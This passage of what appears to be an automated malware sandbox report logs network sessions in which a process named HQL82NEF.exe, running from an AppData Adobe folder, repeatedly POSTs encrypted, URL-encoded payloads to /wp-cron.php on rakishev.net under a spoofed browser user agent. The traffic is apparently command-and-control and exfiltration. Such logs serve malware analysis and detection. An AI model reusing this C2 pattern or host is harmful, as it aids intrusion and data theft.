cEZikRFc004WbALJSdq9qMXZt%2BhEvtOJXiOkMZ2j6uYpEggBTDTpM2YC/R4OLqD%2BEbpiEv8fy9NyU791DEH6gUPmrLgqrKi1vobPVvyA8%2BOcN8yETAhwjIcn5hHlRSRaWOTM5oj7Ws7NFJaN80QuSjNesC57SmBJQXAUueNQTOGqRchzMdKb9eGWqpoLgvFy0GWrBXyuQwqctuKf8iNFDpRTz8gkZKRHM95sSqc%2BmoltIkLpY%2Bd8R
2023-10-03 20:37:33 UTC	3273	OUT	Data Raw: 6f Data Ascii: o
2023-10-03 20:37:33 UTC	3273	OUT	Data Raw: 47 4e 4e 37 42 66 75 79 59 6a 51 4e 71 42 33 49 78 31 47 67 58 47 49 44 6f 41 43 56 6e 68 62 6a 48 70 25 32 42 58 4e 6b 74 48 4c 42 78 51 4f 53 44 65 38 65 6d 71 44 68 36 4b 4c 25 32 42 59 4a 32 32 52 46 52 38 56 63 6b 34 4c 57 46 30 45 73 4d 55 36 73 72 51 72 25 32 42 63 6d 6a 42 49 77 77 72 73 75 55 70 43 30 30 32 68 75 44 49 52 62 79 38 31 33 32 4d 73 4c 59 79 48 66 61 52 4d 71 49 53 62 64 75 6a 61 71 43 6d 38 4b 6a 67 34 44 44 6a 43 32 31 32 48 25 32 42 32 43 61 79 45 30 36 4a 72 6a 57 7a 47 39 41 4a 38 65 6f 69 73 6e 30 39 59 6b 73 6f 69 68 66 6a 43 58 49 31 6c 4e 43 48 6f 62 54 79 6a 56 57 25 32 42 31 73 36 45 7a 47 30 69 31 47 64 58 66 4a 54 79 54 77 44 72 32 42 59 42 35 39 35 43 52 4d 64 49 79 74 39 37 33 62 61 52 67 38 35 31 48 49 4f 4e 4c 72 68 Data Ascii: GNN7BfuyYjQNqB3Ix1GgXGIDoACVnhbjHp%2BXNktHLBxQOSDe8emqDh6KL%2BYJ22RFR8Vck4LWF0EsMU6srQr%2BcmjBIwwrsuUpC002huDIRby8132MsLYyHfaRMqISbdujaqCm8Kjg4DDjC212H%2B2CayE06JrjWzG9AJ8eoisn09YksoihfjCXI1lNCHobTyjVW%2B1s6EzG0i1GdXfJTyTwDr2BYB595CRMdIyt973baRg851HIONLrh
2023-10-03 20:37:33 UTC	3289	OUT	Data Raw: 42 Data Ascii: B
2023-10-03 20:37:33 UTC	3289	OUT	Data Raw: 57 6c 46 38 70 4c 63 63 4b 67 74 4d 64 64 39 6d 62 4a 6e 34 68 25 32 42 74 75 4f 78 41 6a 64 4f 70 7a 79 62 53 54 68 4d 61 50 4c 4d 39 63 55 75 55 72 71 44 6d 64 34 5a 76 59 25 32 42 42 4b 57 64 39 39 36 31 54 45 34 47 4a 75 4e 6b 5a 4f 38 54 33 6d 4e 6f 6f 50 51 5a 65 55 51 4f 74 30 37 36 67 49 7a 76 47 65 6d 25 32 42 4d 74 6e 6a 64 6a 55 54 58 57 6f 73 47 37 79 6a 4f 56 4a 53 46 43 47 4c 43 79 4a 66 67 53 4b 73 4e 6f 58 37 6a 73 59 42 76 34 38 51 74 75 4c 58 62 4f 4b 61 39 35 64 47 73 71 6f 74 70 55 6a 67 5a 58 78 5a 5a 6b 68 6b 35 76 32 6d 35 79 75 39 4e 52 31 39 6f 33 6e 63 73 35 4b 64 72 6b 31 65 6a 74 61 53 4f 6b 66 4f 4d 33 6c 64 44 79 6b 43 35 36 35 4e 58 6f 37 57 6b 6a 70 48 7a 6a 4e 35 58 51 38 70 41 75 65 75 54 56 36 4f 31 70 49 36 52 38 34 7a Data Ascii: WlF8pLccKgtMdd9mbJn4h%2BtuOxAjdOpzybSThMaPLM9cUuUrqDmd4ZvY%2BBKWd9961TE4GJuNkZO8T3mNooPQZeUQOt076gIzvGem%2BMtnjdjUTXWosG7yjOVJSFCGLCyJfgSKsNoX7jsYBv48QtuLXbOKa95dGsqotpUjgZXxZZkhk5v2m5yu9NR19o3ncs5Kdrk1ejtaSOkfOM3ldDykC565NXo7WkjpHzjN5XQ8pAueuTV6O1pI6R84z
2023-10-03 20:37:33 UTC	3305	OUT	Data Raw: 6b Data Ascii: k
2023-10-03 20:37:33 UTC	3305	OUT	Data Raw: 6b 6a 69 6f 46 36 49 76 6d 71 72 48 4a 74 79 79 4a 5a 47 46 43 43 75 32 48 64 62 35 41 43 78 56 52 6f 56 25 32 42 37 73 76 77 25 32 42 37 33 6f 7a 42 34 4a 36 33 4c 75 71 54 79 36 53 4b 67 34 52 42 45 38 67 64 64 47 65 4d 41 75 73 6a 76 77 59 6e 30 4f 71 49 74 6b 48 39 35 56 53 47 62 46 73 75 58 55 50 75 6e 62 25 32 42 33 52 78 5a 73 30 68 36 6d 55 63 35 66 51 75 6b 70 71 4d 4c 6d 71 2f 53 52 6c 74 48 62 43 57 51 51 47 33 78 6e 38 76 4c 58 2f 30 4a 62 43 44 68 67 59 63 59 42 61 38 36 6a 39 5a 47 50 39 43 47 35 32 4c 42 75 4b 67 32 6d 32 48 31 38 42 49 4f 55 6f 74 7a 64 51 75 73 7a 47 65 78 6e 25 32 42 50 45 58 53 49 49 43 67 30 42 33 67 45 4f 44 4b 36 63 66 61 6a 66 68 51 44 53 49 71 4c 25 32 42 55 67 4f 6b 61 77 70 79 6c 75 52 59 78 49 51 37 77 58 30 38 Data Ascii: kjioF6IvmqrHJtyyJZGFCCu2Hdb5ACxVRoV%2B7svw%2B73ozB4J63LuqTy6SKg4RBE8gddGeMAusjvwYn0OqItkH95VSGbFsuXUPunb%2B3RxZs0h6mUc5fQukpqMLmq/SRltHbCWQQG3xn8vLX/0JbCDhgYcYBa86j9ZGP9CG52LBuKg2m2H18BIOUotzdQuszGexn%2BPEXSIICg0B3gEODK6cfajfhQDSIqL%2BUgOkawpyluRYxIQ7wX08
2023-10-03 20:37:33 UTC	3321	OUT	Data Raw: 4b Data Ascii: K
2023-10-03 20:37:33 UTC	3321	OUT	Data Raw: 74 53 74 7a 55 6a 70 34 69 4e 61 42 37 25 32 42 6b 5a 4d 42 4f 79 57 33 56 35 74 30 51 67 64 33 49 33 33 39 63 49 25 32 42 47 66 52 4f 46 43 79 33 25 32 42 51 48 70 72 32 5a 46 6d 25 32 42 66 45 51 4b 4f 73 71 69 34 54 33 37 62 75 2f 76 25 32 42 66 6c 52 74 48 4d 33 6b 76 39 59 68 72 25 32 42 78 68 74 73 49 48 42 59 5a 56 64 70 51 45 32 6d 44 54 75 4e 55 44 72 4b 2f 4f 39 38 31 61 46 47 4c 71 44 33 55 2f 42 54 58 37 4c 45 53 70 4b 32 6c 61 43 33 42 75 7a 4b 51 4a 61 51 68 55 67 42 6d 41 37 57 4b 25 32 42 41 61 71 31 5a 6f 58 79 39 57 6e 44 64 51 70 36 49 25 32 42 42 32 4e 25 32 42 55 65 61 43 62 31 76 6f 32 56 77 47 68 51 4a 34 30 6d 42 2f 67 6d 48 35 33 45 35 66 4a 67 74 73 62 4c 6d 25 32 42 76 58 73 4c 46 4b 67 43 4a 4b 56 42 62 53 54 45 4c 46 4b 6f 39 Data Ascii: tStzUjp4iNaB7%2BkZMBOyW3V5t0Qgd3I339cI%2BGfROFCy3%2BQHpr2ZFm%2BfEQKOsqi4T37bu/v%2BflRtHM3kv9Yhr%2BxhtsIHBYZVdpQE2mDTuNUDrK/O981aFGLqD3U/BTX7LESpK2laC3BuzKQJaQhUgBmA7WK%2BAaq1ZoXy9WnDdQp6I%2BB2N%2BUeaCb1vo2VwGhQJ40mB/gmH53E5fJgtsbLm%2BvXsLFKgCJKVBbSTELFKo9
2023-10-03 20:37:33 UTC	3337	OUT	Data Raw: 75 Data Ascii: u
2023-10-03 20:37:33 UTC	3337	OUT	Data Raw: 43 4c 69 2f 4d 59 71 38 67 4a 58 34 35 45 49 56 79 6a 36 38 69 71 44 25 32 42 52 70 70 6c 37 76 51 62 31 56 38 39 75 68 55 32 75 44 72 31 72 66 31 38 6b 6a 6a 56 46 68 69 6c 69 74 61 5a 39 47 7a 6a 32 34 56 42 77 53 32 71 2f 59 39 78 42 7a 54 59 4f 4e 6d 72 6e 68 71 52 37 55 50 54 6d 46 70 4b 52 44 44 78 47 55 38 59 30 36 62 32 49 53 61 4f 76 59 4b 46 72 50 33 49 31 6d 53 38 74 33 45 4c 76 52 57 45 37 63 34 77 6d 55 47 48 36 6d 58 35 4d 6d 65 69 33 52 50 65 4a 56 74 4f 58 6d 31 58 25 32 42 48 6f 71 7a 73 44 44 6d 57 6a 54 74 63 41 43 58 35 32 52 6b 6c 37 6e 6d 4d 7a 64 57 68 6b 61 6c 62 50 66 76 4e 31 63 65 4a 42 52 37 79 45 33 5a 6d 55 65 67 44 6f 68 56 53 73 75 49 4a 4b 69 44 51 65 47 7a 48 62 74 42 76 54 48 73 34 6e 74 55 75 61 25 32 42 6b 46 32 5a 61 Data Ascii: CLi/MYq8gJX45EIVyj68iqD%2BRppl7vQb1V89uhU2uDr1rf18kjjVFhilitaZ9Gzj24VBwS2q/Y9xBzTYONmrnhqR7UPTmFpKRDDxGU8Y06b2ISaOvYKFrP3I1mS8t3ELvRWE7c4wmUGH6mX5Mmei3RPeJVtOXm1X%2BHoqzsDDmWjTtcACX52Rkl7nmMzdWhkalbPfvN1ceJBR7yE3ZmUegDohVSsuIJKiDQeGzHbtBvTHs4ntUua%2BkF2Za

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
26	192.168.2.4	49884	172.67.150.79	443	C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe

Timestamp	kBytes transferred	Direction	Data
2023-10-03 20:37:35 UTC	3353	OUT	POST /wp-cron.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: rakishev.net Content-Length: 280 Expect: 100-continue
2023-10-03 20:37:36 UTC	3353	IN	HTTP/1.1 100 Continue
2023-10-03 20:37:36 UTC	3353	OUT	Data Raw: 70 Data Ascii: p
2023-10-03 20:37:36 UTC	3353	OUT	Data Raw: 3d 6b 45 42 35 7a 77 54 78 44 74 45 41 6f 59 7a 46 54 62 6f 55 4d 73 4e 4d 32 73 69 43 75 70 43 65 2f 6d 78 70 52 72 4a 4c 72 4f 68 25 32 42 36 31 31 64 42 69 65 6b 72 4a 74 34 38 51 4e 56 6a 4c 77 76 34 53 33 34 59 5a 39 79 62 54 31 4d 6a 6a 45 32 36 70 52 4a 52 45 69 7a 62 49 39 79 6a 30 44 47 55 45 5a 6e 61 61 67 47 73 52 79 72 70 58 67 59 6c 67 44 4c 42 4d 6c 71 76 45 67 4b 25 32 42 47 75 55 6a 53 45 75 30 73 73 66 4f 62 54 47 61 68 6f 46 59 6d 5a 52 37 44 66 4a 71 75 4d 4c 6f 49 47 58 74 4c 39 73 56 67 41 6f 64 42 38 65 58 74 43 39 7a 2f 44 44 66 5a 79 4a 47 72 46 30 44 46 70 4f 36 75 54 78 2f 45 52 45 34 69 37 64 25 32 42 62 4d 30 49 5a 73 34 41 44 6b 44 70 33 59 6d 59 44 35 37 38 25 32 42 56 49 35 47 25 32 42 39 47 58 78 63 4b 63 52 72 38 7a 65 6d Data Ascii: =kEB5zwTxDtEAoYzFTboUMsNM2siCupCe/mxpRrJLrOh%2B611dBiekrJt48QNVjLwv4S34YZ9ybT1MjjE26pRJREizbI9yj0DGUEZnaagGsRyrpXgYlgDLBMlqvEgK%2BGuUjSEu0ssfObTGahoFYmZR7DfJquMLoIGXtL9sVgAodB8eXtC9z/DDfZyJGrF0DFpO6uTx/ERE4i7d%2BbM0IZs4ADkDp3YmYD578%2BVI5G%2B9GXxcKcRr8zem
2023-10-03 20:37:36 UTC	3464	IN	HTTP/1.1 200 OK Date: Tue, 03 Oct 2023 20:37:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/5.6.40 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=C1FEJfgaCF5HFdNnqi8gWdRldxgPz32p1VH2%2BC%2FUV49BUAG4lKC4cNdzAZtOQJ0IXflJDRtaKRWVOn9%2BNowuA%2BSn2PTBapMrRHYltAOOT0DX9R7rKM1nMDIcJGLhS38%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8107fbe478f00816-IAD alt-svc: h3=":443"; ma=86400 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
27	192.168.2.4	49885	172.67.150.79	443	C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe

Timestamp	kBytes transferred	Direction	Data
2023-10-03 20:37:36 UTC	3353	OUT	POST /wp-cron.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: rakishev.net Content-Length: 112822 Expect: 100-continue Connection: Keep-Alive
2023-10-03 20:37:36 UTC	3354	IN	HTTP/1.1 100 Continue
2023-10-03 20:37:36 UTC	3354	OUT	Data Raw: 70 Data Ascii: p
2023-10-03 20:37:36 UTC	3354	OUT	Data Raw: 3d 6d 77 6a 4f 70 4f 61 59 65 36 34 70 42 63 51 30 61 54 65 33 4d 4d 52 39 51 47 75 4e 6b 34 32 4e 55 4d 48 79 62 71 7a 58 75 78 67 6a 44 38 4d 65 61 71 4c 6e 49 56 54 6c 68 34 37 49 6f 71 4a 54 59 78 48 46 7a 66 2f 5a 51 74 70 70 78 37 4d 42 47 71 70 2f 25 32 42 79 71 35 4b 71 55 49 6f 66 47 55 64 25 32 42 62 41 4f 50 4d 61 33 48 50 71 4c 53 71 73 35 78 77 33 32 34 49 4d 72 39 62 78 66 43 58 68 76 45 49 48 32 6f 48 34 52 57 41 6a 32 37 4a 57 45 7a 42 58 46 78 58 36 36 71 31 4a 69 4e 41 54 48 33 79 31 39 47 6e 44 30 30 43 77 45 44 73 37 4b 32 61 47 77 57 41 68 6f 73 62 51 54 43 61 77 56 6b 2f 56 6c 41 58 78 4a 4d 4b 33 64 53 4f 78 35 76 59 59 79 46 4f 7a 7a 75 79 78 66 39 77 57 55 4d 43 52 35 4c 69 34 38 6a 25 32 42 69 68 79 5a 59 6c 66 46 73 48 65 65 79 Data Ascii: =mwjOpOaYe64pBcQ0aTe3MMR9QGuNk42NUMHybqzXuxgjD8MeaqLnIVTlh47IoqJTYxHFzf/ZQtppx7MBGqp/%2Byq5KqUIofGUd%2BbAOPMa3HPqLSqs5xw324IMr9bxfCXhvEIH2oH4RWAj27JWEzBXFxX66q1JiNATH3y19GnD00CwEDs7K2aGwWAhosbQTCawVk/VlAXxJMK3dSOx5vYYyFOzzuyxf9wWUMCR5Li48j%2BihyZYlfFsHeey
2023-10-03 20:37:36 UTC	3370	OUT	Data Raw: 6d Data Ascii: m
2023-10-03 20:37:36 UTC	3370	OUT	Data Raw: 64 34 77 77 54 62 34 6e 47 79 43 35 73 75 71 61 57 6e 4c 49 67 74 6d 72 65 54 44 56 25 32 42 67 68 47 2f 31 63 57 55 51 66 75 36 62 56 6a 56 45 47 45 42 4a 6d 63 52 69 6d 43 33 35 6d 44 6f 47 77 4f 39 51 64 46 47 65 52 30 70 64 4d 56 5a 4e 25 32 42 73 4d 52 46 4f 75 57 41 44 39 2f 79 4a 57 48 62 36 71 35 4d 32 36 75 33 31 45 56 4a 35 35 6b 69 46 6d 50 63 76 6d 4d 59 51 4d 57 69 46 59 25 32 42 68 67 25 32 42 4d 6a 73 55 32 79 62 78 6e 48 79 37 74 78 48 78 4b 41 71 64 73 50 6e 48 63 67 2f 2f 4a 41 69 53 77 33 32 63 63 41 72 4d 70 61 68 68 57 74 59 31 50 77 52 50 64 4f 71 70 62 4d 71 74 74 4e 59 4d 55 6a 77 6a 34 4e 30 30 52 31 39 76 47 6d 67 5a 53 47 4d 63 4c 2f 64 44 6c 6a 79 68 75 6f 48 44 70 42 78 68 6c 45 6d 37 48 35 34 58 67 73 7a 51 42 66 47 35 70 50 Data Ascii: d4wwTb4nGyC5suqaWnLIgtmreTDV%2BghG/1cWUQfu6bVjVEGEBJmcRimC35mDoGwO9QdFGeR0pdMVZN%2BsMRFOuWAD9/yJWHb6q5M26u31EVJ55kiFmPcvmMYQMWiFY%2Bhg%2BMjsU2ybxnHy7txHxKAqdsPnHcg//JAiSw32ccArMpahhWtY1PwRPdOqpbMqttNYMUjwj4N00R19vGmgZSGMcL/dDljyhuoHDpBxhlEm7H54XgszQBfG5pP
2023-10-03 20:37:36 UTC	3386	OUT	Data Raw: 69 Data Ascii: i
2023-10-03 20:37:36 UTC	3386	OUT	Data Raw: 6a 37 50 47 58 2f 39 77 63 68 4f 2f 67 77 79 78 66 77 64 45 54 71 31 68 35 4f 6a 6c 76 4a 77 4e 2f 35 67 6d 48 64 63 30 79 2f 79 4a 42 25 32 42 55 2f 51 44 73 71 79 5a 44 4e 52 74 58 32 66 73 66 25 32 42 6e 32 47 6d 65 34 4d 45 56 78 43 7a 6f 67 75 6b 36 74 6c 4e 66 4b 37 4c 73 4c 6e 57 78 32 62 7a 70 34 37 6b 66 54 73 6d 56 76 6e 79 73 37 56 2f 53 6f 71 39 30 55 6a 53 45 4d 43 48 52 4c 73 58 4b 64 45 37 6c 65 77 39 33 4c 50 42 41 39 69 51 72 4a 56 64 34 63 6b 58 79 4a 4e 64 49 4f 51 76 68 31 77 33 33 46 4e 6d 33 49 58 47 6c 78 73 68 6c 78 32 67 43 62 6f 53 73 6c 49 48 4f 62 67 36 54 72 32 67 38 63 33 31 77 4a 54 38 6b 4a 6f 6a 62 55 72 55 30 68 68 43 42 61 43 6a 58 59 37 55 49 4f 61 64 67 74 74 63 6d 66 32 6a 50 36 73 35 2f 68 77 42 62 32 74 58 4d 47 50 Data Ascii: j7PGX/9wchO/gwyxfwdETq1h5OjlvJwN/5gmHdc0y/yJB%2BU/QDsqyZDNRtX2fsf%2Bn2Gme4MEVxCzoguk6tlNfK7LsLnWx2bzp47kfTsmVvnys7V/Soq90UjSEMCHRLsXKdE7lew93LPBA9iQrJVd4ckXyJNdIOQvh1w33FNm3IXGlxshlx2gCboSslIHObg6Tr2g8c31wJT8kJojbUrU0hhCBaCjXY7UIOadgttcmf2jP6s5/hwBb2tXMGP
2023-10-03 20:37:36 UTC	3401	OUT	Data Raw: 35 Data Ascii: 5
2023-10-03 20:37:36 UTC	3401	OUT	Data Raw: 6b 5a 53 43 70 7a 52 78 73 38 56 4c 65 4f 4a 64 76 75 42 4c 44 67 79 2f 62 65 65 77 6a 56 4f 4d 6f 63 4c 66 75 7a 78 78 48 2f 32 52 64 59 41 4f 73 67 41 35 25 32 42 4c 6e 35 33 76 33 68 66 47 57 44 73 68 4b 70 79 56 50 38 72 46 52 4c 6c 58 73 79 64 33 65 61 73 36 66 6e 33 6f 49 4f 46 6a 47 25 32 42 6d 63 61 68 4f 41 78 4e 5a 72 53 6e 38 69 61 4b 4d 55 25 32 42 2f 57 77 68 32 7a 79 78 66 56 72 4f 37 70 56 69 63 37 44 67 49 68 42 53 67 4d 64 44 75 68 76 51 35 4d 4f 69 75 4b 4b 58 47 57 78 57 4a 4a 56 50 32 53 73 50 39 4a 55 55 59 43 6d 75 4f 41 61 66 61 6e 36 35 57 48 6b 4b 31 75 35 43 4e 4e 7a 42 31 64 39 2f 45 32 31 6c 6e 59 38 42 55 65 4b 69 4d 49 6c 57 30 47 35 6f 51 4a 56 44 75 34 46 77 6f 56 76 43 46 37 33 34 64 44 31 49 76 30 55 79 72 45 6d 42 6f 6d Data Ascii: kZSCpzRxs8VLeOJdvuBLDgy/beewjVOMocLfuzxxH/2RdYAOsgA5%2BLn53v3hfGWDshKpyVP8rFRLlXsyd3eas6fn3oIOFjG%2BmcahOAxNZrSn8iaKMU%2B/Wwh2zyxfVrO7pVic7DgIhBSgMdDuhvQ5MOiuKKXGWxWJJVP2SsP9JUUYCmuOAafan65WHkK1u5CNNzB1d9/E21lnY8BUeKiMIlW0G5oQJVDu4FwoVvCF734dD1Iv0UyrEmBom
2023-10-03 20:37:36 UTC	3417	OUT	Data Raw: 72 Data Ascii: r
2023-10-03 20:37:36 UTC	3417	OUT	Data Raw: 61 34 4d 79 62 46 59 48 6d 72 49 37 42 6c 37 31 45 46 6f 6b 54 31 6c 47 54 66 78 4f 69 36 67 7a 77 65 64 56 41 51 63 54 54 62 35 51 49 71 70 38 44 76 74 58 30 69 63 62 2f 72 34 55 52 30 6c 44 39 59 69 59 25 32 42 57 48 37 55 35 37 53 6e 45 52 43 42 48 4e 47 32 39 38 4d 66 70 64 25 32 42 67 64 59 71 54 78 5a 6f 79 31 32 55 2f 6f 68 53 6f 74 35 6b 41 6c 35 68 39 64 4d 77 64 34 35 42 36 74 48 39 42 53 76 36 7a 52 37 72 37 63 59 44 70 67 4c 53 4c 45 73 2f 4c 25 32 42 72 36 37 71 65 49 7a 34 44 6f 4f 4e 6b 77 31 43 46 2f 47 72 6e 78 41 32 63 6f 47 66 59 32 41 4c 47 42 51 66 4c 4b 58 52 39 49 54 50 64 6c 71 53 61 74 41 78 53 6d 33 55 56 56 47 61 6e 34 34 48 6a 50 74 64 59 73 6a 70 46 63 4f 4f 41 51 4f 30 25 32 42 64 76 44 33 41 61 62 48 54 67 5a 51 4d 4c 4b 34 Data Ascii: a4MybFYHmrI7Bl71EFokT1lGTfxOi6gzwedVAQcTTb5QIqp8DvtX0icb/r4UR0lD9YiY%2BWH7U57SnERCBHNG298Mfpd%2BgdYqTxZoy12U/ohSot5kAl5h9dMwd45B6tH9BSv6zR7r7cYDpgLSLEs/L%2Br67qeIz4DoONkw1CF/GrnxA2coGfY2ALGBQfLKXR9ITPdlqSatAxSm3UVVGan44HjPtdYsjpFcOOAQO0%2BdvD3AabHTgZQMLK4
2023-10-03 20:37:36 UTC	3433	OUT	Data Raw: 77 Data Ascii: w
2023-10-03 20:37:36 UTC	3433	OUT	Data Raw: 53 61 63 79 4e 32 75 32 35 64 57 5a 66 53 55 73 30 54 64 59 73 47 7a 49 45 6d 36 63 4c 39 4d 54 36 6a 4d 4a 4b 78 35 49 71 35 30 77 7a 47 63 77 77 50 34 78 76 41 30 2f 64 46 57 45 55 61 64 53 38 75 65 6f 67 32 4d 6e 61 50 48 6b 52 65 73 58 71 48 57 69 25 32 42 73 4f 4f 46 41 67 66 46 6f 41 78 2f 38 5a 37 4c 4f 34 75 51 55 4d 55 4c 2f 47 4f 74 66 54 7a 5a 78 68 52 2f 56 72 36 42 46 78 63 78 41 30 46 67 35 4c 72 70 51 65 55 69 55 59 33 79 42 31 4e 73 72 25 32 42 72 6b 58 61 48 73 59 65 4e 64 5a 6b 6c 62 6d 4e 79 73 6f 31 52 4d 4c 54 33 4a 61 54 25 32 42 46 70 37 69 77 49 33 78 56 54 67 51 6d 78 37 4c 46 58 48 31 64 59 41 2f 69 35 43 72 4a 43 65 4d 76 79 79 75 2f 34 61 69 63 76 6b 70 76 66 50 48 73 42 4d 55 32 75 41 61 48 79 77 66 65 34 4b 63 54 35 66 69 68 Data Ascii: SacyN2u25dWZfSUs0TdYsGzIEm6cL9MT6jMJKx5Iq50wzGcwwP4xvA0/dFWEUadS8ueog2MnaPHkResXqHWi%2BsOOFAgfFoAx/8Z7LO4uQUMUL/GOtfTzZxhR/Vr6BFxcxA0Fg5LrpQeUiUY3yB1Nsr%2BrkXaHsYeNdZklbmNyso1RMLT3JaT%2BFp7iwI3xVTgQmx7LFXH1dYA/i5CrJCeMvyyu/4aicvkpvfPHsBMU2uAaHywfe4KcT5fih
2023-10-03 20:37:36 UTC	3449	OUT	Data Raw: 56 Data Ascii: V
2023-10-03 20:37:36 UTC	3449	OUT	Data Raw: 4d 45 7a 39 50 31 5a 31 36 37 35 63 4c 45 50 42 33 53 49 66 35 75 47 79 6e 4a 36 5a 37 4c 44 6d 54 58 47 6d 63 46 42 53 4e 52 46 74 4b 7a 52 49 58 31 66 4c 38 31 61 75 43 52 34 58 47 50 4b 41 5a 43 57 6f 4f 75 4c 5a 6d 59 6f 47 45 78 6d 69 76 4d 6d 25 32 42 69 68 65 65 43 30 41 52 50 45 44 46 4b 33 6f 67 58 6f 64 47 49 73 57 45 4d 6d 79 35 74 44 44 2f 79 46 44 44 41 74 49 7a 62 6a 74 69 58 61 4d 6b 56 54 43 69 68 6a 39 59 75 36 30 43 67 46 39 36 6d 4e 37 77 53 4b 46 50 63 6a 52 45 48 75 4d 7a 6c 51 4f 4c 73 59 34 33 75 4f 4f 47 66 72 63 54 61 69 65 32 37 4b 77 6c 6f 46 5a 7a 7a 77 6f 73 44 48 34 35 42 78 30 62 35 79 52 4f 69 78 41 44 61 77 47 59 67 49 46 55 44 48 35 64 6e 4f 54 4d 70 74 74 4c 69 33 51 69 71 78 38 5a 55 32 4e 6d 4f 59 67 2f 49 38 41 38 76 Data Ascii: MEz9P1Z1675cLEPB3SIf5uGynJ6Z7LDmTXGmcFBSNRFtKzRIX1fL81auCR4XGPKAZCWoOuLZmYoGExmivMm%2BiheeC0ARPEDFK3ogXodGIsWEMmy5tDD/yFDDAtIzbjtiXaMkVTCihj9Yu60CgF96mN7wSKFPcjREHuMzlQOLsY43uOOGfrcTaie27KwloFZzzwosDH45Bx0b5yROixADawGYgIFUDH5dnOTMpttLi3Qiqx8ZU2NmOYg/I8A8v
2023-10-03 20:37:37 UTC	3464	IN	HTTP/1.1 200 OK Date: Tue, 03 Oct 2023 20:37:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/5.6.40 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=tYc4wvWpXCGO4qOhTzJL65M8pkQ7Au2VmbZezfDsPVbXf45LV5zCwYc8856s6USsIcNgwdsF832zEGE2sNfzGAGixHwMa4lWHTtL8Uy61s0Eu%2F9hI2lryDbjMNWqqtI%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8107fbe528cb8191-IAD alt-svc: h3=":443"; ma=86400 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
28	192.168.2.4	49887	172.67.150.79	443	C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe

Timestamp	kBytes transferred	Direction	Data
2023-10-03 20:37:41 UTC	3465	OUT	POST /wp-cron.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: rakishev.net Content-Length: 280 Expect: 100-continue
2023-10-03 20:37:41 UTC	3466	IN	HTTP/1.1 100 Continue
2023-10-03 20:37:41 UTC	3466	OUT	Data Raw: 70 Data Ascii: p
2023-10-03 20:37:41 UTC	3466	OUT	Data Raw: 3d 6b 45 42 35 7a 77 54 78 44 74 45 41 6f 59 7a 46 54 62 6f 55 4d 73 4e 4d 32 73 69 43 75 70 43 65 2f 6d 78 70 52 72 4a 4c 72 4f 68 25 32 42 36 31 31 64 42 69 65 6b 72 4a 74 34 38 51 4e 56 6a 4c 77 76 34 53 33 34 59 5a 39 79 62 54 31 4d 6a 6a 45 32 36 70 52 4a 52 45 69 7a 62 49 39 79 6a 30 44 47 55 45 5a 6e 61 61 67 47 73 52 79 72 70 58 67 59 6c 67 44 4c 42 4d 6c 71 76 45 67 4b 25 32 42 47 75 55 6a 53 45 75 30 73 73 66 4f 62 54 47 61 68 6f 46 59 6d 5a 52 37 44 66 4a 71 75 4d 4c 6f 49 47 58 74 4c 39 73 56 67 41 6f 64 42 38 65 58 74 43 39 7a 2f 44 44 66 5a 79 4a 47 72 46 30 44 46 70 4f 36 75 54 78 2f 45 52 45 34 69 37 64 25 32 42 62 4d 30 49 5a 73 34 41 44 6b 44 70 33 59 6d 59 44 35 37 38 25 32 42 56 49 35 47 25 32 42 39 47 58 78 63 4b 63 52 72 38 7a 65 6d Data Ascii: =kEB5zwTxDtEAoYzFTboUMsNM2siCupCe/mxpRrJLrOh%2B611dBiekrJt48QNVjLwv4S34YZ9ybT1MjjE26pRJREizbI9yj0DGUEZnaagGsRyrpXgYlgDLBMlqvEgK%2BGuUjSEu0ssfObTGahoFYmZR7DfJquMLoIGXtL9sVgAodB8eXtC9z/DDfZyJGrF0DFpO6uTx/ERE4i7d%2BbM0IZs4ADkDp3YmYD578%2BVI5G%2B9GXxcKcRr8zem
2023-10-03 20:37:42 UTC	3582	IN	HTTP/1.1 200 OK Date: Tue, 03 Oct 2023 20:37:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/5.6.40 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=N0mJXgVaHGkPeSKYZWV4THkTSMlhkacrKGI5iED5zz3h3hm3I7GH1iwZgvXoPq1dcf1uwyb1%2FbZzY7Qz%2BDzpW47X%2Fd4vvwIbI3wP2NJ6jbPygvB5mwBaexHH7pNwhhQ%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8107fc081b672072-IAD alt-svc: h3=":443"; ma=86400 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
29	192.168.2.4	49888	172.67.150.79	443	C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe

Timestamp	kBytes transferred	Direction	Data
